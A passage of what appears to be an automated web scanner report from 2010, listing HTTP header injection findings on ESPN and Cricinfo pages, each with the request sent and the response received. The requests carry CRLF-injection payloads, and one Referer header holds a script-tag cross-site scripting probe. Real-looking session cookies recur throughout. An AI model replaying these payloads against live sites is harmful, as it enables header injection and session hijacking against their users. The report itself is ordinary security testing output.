Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Content-Length: 201
Content-Type: text/html; charset=iso-8859-1
Location: /pokerpickem/en/f3394
260e20407d2
/frontpage
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"

<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/pokerpickem/en/f3394
260e20407d2/frontpage">/pokerpickem/en/f3394
260e20407d2/frontpage</A>.<BODY></HTML
...[SNIP]...

4.34. http://games.espn.go.com/pokerpickem/en/group [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.espn.go.com
Path:   /pokerpickem/en/group

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 4ec69%0d%0a484c4d23469 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /pokerpickem/4ec69%0d%0a484c4d23469/group HTTP/1.1
Host: games.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Content-Length: 193
Content-Type: text/html; charset=iso-8859-1
Location: /pokerpickem/en/4ec69
484c4d23469
/group
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"

<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/pokerpickem/en/4ec69
484c4d23469/group">/pokerpickem/en/4ec69
484c4d23469/group</A>.<BODY></HTML>

4.35. http://games.espn.go.com/pokerpickem/en/story [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.espn.go.com
Path:   /pokerpickem/en/story

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload a807e%0d%0a898e11a593d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /pokerpickem/a807e%0d%0a898e11a593d/story HTTP/1.1
Host: games.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Content-Length: 193
Content-Type: text/html; charset=iso-8859-1
Location: /pokerpickem/en/a807e
898e11a593d
/story
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"

<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/pokerpickem/en/a807e
898e11a593d/story">/pokerpickem/en/a807e
898e11a593d/story</A>.<BODY></HTML>

4.36. http://streak.espn.go.com/createOrUpdateEntry [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://streak.espn.go.com
Path:   /createOrUpdateEntry

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload db6fa%0d%0a57ddd8e895b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /db6fa%0d%0a57ddd8e895b HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Content-Length: 157
Content-Type: text/html; charset=iso-8859-1
Location: /en/db6fa
57ddd8e895b

Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"

<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/db6fa
57ddd8e895b">/en/db6fa
57ddd8e895b</A>.<BODY></HTML>

4.37. http://streak.espn.go.com/en/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://streak.espn.go.com
Path:   /en/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 31be1%0d%0a5bb07d47379 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /31be1%0d%0a5bb07d47379/ HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Content-Length: 159
Content-Type: text/html; charset=iso-8859-1
Location: /en/31be1
5bb07d47379
/
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"

<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/31be1
5bb07d47379/">/en/31be1
5bb07d47379/</A>.<BODY></HTML>

4.38. http://streak.espn.go.com/en/conversation [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://streak.espn.go.com
Path:   /en/conversation

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1babd%0d%0a818dc4039b8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1babd%0d%0a818dc4039b8/conversation HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Content-Length: 183
Content-Type: text/html; charset=iso-8859-1
Location: /en/1babd
818dc4039b8
/conversation
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"

<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/1babd
818dc4039b8/conversation">/en/1babd
818dc4039b8/conversation</A>.<BODY></HTML>

4.39. http://streak.espn.go.com/en/createOrUpdateEntry [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://streak.espn.go.com
Path:   /en/createOrUpdateEntry

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6d6b6%0d%0a1e751f105f3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6d6b6%0d%0a1e751f105f3/createOrUpdateEntry HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Content-Length: 197
Content-Type: text/html; charset=iso-8859-1
Location: /en/6d6b6
1e751f105f3
/createOrUpdateEntry
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"

<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/6d6b6
1e751f105f3/createOrUpdateEntry">/en/6d6b6
1e751f105f3/createOrUpdateEntry</A>.<BODY></HTML>

4.40. http://streak.espn.go.com/en/entry [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://streak.espn.go.com
Path:   /en/entry

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 60040%0d%0a06f626c9e72 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /60040%0d%0a06f626c9e72/entry HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Content-Length: 169
Content-Type: text/html; charset=iso-8859-1
Location: /en/60040
06f626c9e72
/entry
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"

<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/60040
06f626c9e72/entry">/en/60040
06f626c9e72/entry</A>.<BODY></HTML>

4.41. http://streak.espn.go.com/en/entryStats [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://streak.espn.go.com
Path:   /en/entryStats

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 63b5f%0d%0acf2b0e791bb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /63b5f%0d%0acf2b0e791bb/entryStats HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Content-Length: 179
Content-Type: text/html; charset=iso-8859-1
Location: /en/63b5f
cf2b0e791bb
/entryStats
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"

<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/63b5f
cf2b0e791bb/entryStats">/en/63b5f
cf2b0e791bb/entryStats</A>.<BODY></HTML>

4.42. http://streak.espn.go.com/en/story [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://streak.espn.go.com
Path:   /en/story

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7b78a%0d%0a54f670ab62 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7b78a%0d%0a54f670ab62/story HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Content-Length: 167
Content-Type: text/html; charset=iso-8859-1
Location: /en/7b78a
54f670ab62
/story
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"

<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/7b78a
54f670ab62/story">/en/7b78a
54f670ab62/story</A>.<BODY></HTML>

4.43. http://submit.cricinfo.com/ci/content/submit/comment/redirect.html [object_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /ci/content/submit/comment/redirect.html

Issue detail

The value of the object_id request parameter is copied into the Location response header. The payload 3ca92%0d%0a5d6cccec3bc was submitted in the object_id parameter. This caused a response containing an injected HTTP header.

Request

GET /ci/content/submit/comment/redirect.html?object_id=3ca92%0d%0a5d6cccec3bc HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.cricinfo.com/australia-v-sri-lanka-2010/content/story/485657.html?5fcad"><script>alert(1)</script>7b256488062=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: submit.cricinfo.com

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 07 Nov 2010 03:12:20 GMT
Server: Apache
Set-Cookie: Q_cricinfo_country=us; path=/; domain=.cricinfo.com
Set-Cookie: Q_cricinfo_cluster=usa; path=/; domain=.cricinfo.com
Location: /ci/content/submit/comment/usr_login.html?object_id=3ca92
5d6cccec3bc
;content_type_id=;genre_id=;story_abstract=;story_title=
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 334

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="/ci/content/submit/comm
...[SNIP]...

5. Cross-site scripting (reflected)  previous  next
There are 182 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

